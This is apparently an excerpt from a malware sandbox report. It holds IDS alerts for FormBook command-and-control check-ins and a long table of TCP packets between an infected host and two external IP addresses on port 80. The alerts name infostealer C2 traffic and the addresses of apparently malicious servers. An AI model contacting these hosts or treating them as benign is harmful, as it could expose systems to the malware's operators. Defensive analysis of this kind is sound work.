                                                                          2024-12-02T07:10:45.307145+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449844172.67.145.23480TCP
                                                                          2024-12-02T07:10:47.946576+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449850172.67.145.23480TCP
                                                                          2024-12-02T07:10:50.711038+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449856172.67.145.23480TCP
                                                                          2024-12-02T07:10:53.421938+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449865172.67.145.23480TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 2, 2024 07:09:43.620749950 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:43.740983009 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:43.741089106 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:43.741488934 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:43.862186909 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.075445890 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.075604916 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.075645924 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.075656891 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.075669050 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.075685978 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.075695992 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.075709105 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.075710058 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.075721979 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.075728893 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.075752974 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.075792074 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.075896025 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.075939894 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.075952053 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.075963974 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.075985909 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.076005936 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.195900917 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.195914030 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.195955038 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.195970058 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.286009073 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.286101103 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.286114931 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.286144972 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.290066957 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.290128946 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.290158033 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.290203094 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.296590090 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.296660900 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.296742916 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.296895981 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.305037975 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.305102110 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.305134058 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.305174112 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.313574076 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.313673973 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.313755035 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.321903944 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.321959019 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.322026968 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.322077990 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.330370903 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.330432892 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.330526114 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.330575943 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.338821888 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.338886023 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.338918924 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.338987112 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.346470118 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.346515894 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.346575975 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.346621990 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.354152918 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.354217052 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.354243040 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.354290009 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.361829996 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.361882925 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.361882925 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.361972094 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.496423006 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.496474028 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.496542931 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.496592045 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.499454021 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.499502897 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.499596119 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.499641895 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.505856037 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.505870104 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.505917072 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.511866093 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.511915922 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.511984110 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.512032986 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.518098116 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.518146992 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.518212080 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.518260956 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.524317026 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.524364948 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.524403095 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.524447918 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.530563116 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.530611038 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.530678034 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.530725002 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.536775112 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.536815882 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.536886930 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.536930084 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.542941093 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.542989969 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.543072939 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.543118954 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.549149036 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.549196005 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.549328089 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.549376011 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.555310011 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.555356979 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.555453062 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.555497885 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.561526060 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.561578035 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.561659098 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.561707020 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.567759991 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.567806005 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.567857981 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.567907095 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.573915005 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.573964119 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.574037075 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.574084044 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.580163956 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.580205917 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.580275059 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.580317974 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.586415052 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.586463928 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.586556911 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.586600065 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.592575073 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.592621088 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.592662096 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.592715979 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.598727942 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.598774910 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.706729889 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.706809998 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.706819057 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.706856966 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.708153963 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.708193064 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.708250999 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.708292007 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.713100910 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.713152885 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.713196993 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.713237047 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.717983007 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.718053102 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.718102932 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.718147039 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.722918987 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.722980976 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.723021030 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.723068953 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.727857113 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.727910995 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.727935076 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.727978945 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.732697010 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.732775927 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.732848883 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.732894897 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.737598896 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.737656116 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.737694025 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.737735033 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.742480040 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.742532969 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.742590904 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.742633104 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.747381926 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.747432947 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.747474909 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.747519016 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.752084017 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.752165079 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.752197981 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.752244949 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.756932020 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.756982088 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.757096052 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.757138014 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.761661053 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.761712074 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.761744022 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.761789083 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.766349077 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.766417980 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.766449928 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.766509056 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.771068096 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.771121025 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.771178961 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.771219969 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.775826931 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.775880098 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.775911093 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.775960922 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.780560017 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.780610085 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.780683041 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.780725002 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.785283089 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.785331011 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.785444975 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.785489082 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.790067911 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.790117025 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.790157080 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.790198088 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.794776917 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.794825077 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.794887066 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.794929981 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.799566031 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.799617052 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.799653053 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.799757004 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.804300070 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.804352045 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.804378986 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.804423094 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.808965921 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.809031010 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.809077024 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.809123039 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.813747883 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.813805103 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.813848972 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.813894987 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.818471909 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.818521023 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.818586111 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.818646908 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.823229074 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.823282957 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.823338985 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.823383093 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.827918053 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.827976942 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.917495012 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.917594910 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.917690992 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.917690992 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.919126034 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.919178963 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.919238091 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.919280052 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.922555923 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.922605991 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.922668934 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.922707081 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.925981998 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.926033974 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.926093102 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.926134109 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.929434061 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.929487944 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.929547071 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.929594994 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.932760954 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.932820082 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.932888985 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.932930946 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.936047077 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.936100960 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.936145067 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.936187983 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.939253092 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.939328909 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.939347982 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.939421892 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.942404985 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.942462921 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.942523003 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.942565918 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.945549011 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.945605040 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.945647955 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.945691109 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.948630095 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.948683977 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.948721886 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.948761940 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.951730013 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.951797009 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.951850891 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.951895952 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.954760075 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.954807043 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.954839945 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.954881907 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.957772017 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.957820892 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.957854033 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.957899094 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.960777998 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.960839033 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.960942984 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.960988998 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.963823080 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.963881016 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.963907957 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.963948011 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.966805935 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.966869116 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.966907978 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.966967106 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.969829082 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.969878912 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.969921112 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.969963074 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.972846985 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.972903013 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.972959042 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.973001003 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.975907087 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.975969076 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.976001978 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.976042986 CET4973680192.168.2.4103.83.194.50
